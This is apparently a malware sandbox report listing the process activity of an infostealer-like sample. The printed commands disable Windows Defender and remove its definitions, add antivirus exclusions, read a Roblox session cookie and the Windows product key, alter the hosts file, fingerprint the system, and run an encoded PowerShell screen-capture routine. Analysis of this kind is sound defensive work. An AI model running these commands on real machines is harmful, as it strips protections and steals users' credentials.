gagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Users\user\Desktop\VSSADMIN.EXE.exe C:\Users\user\Desktop\VSSADMIN.EXE.exeJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP"
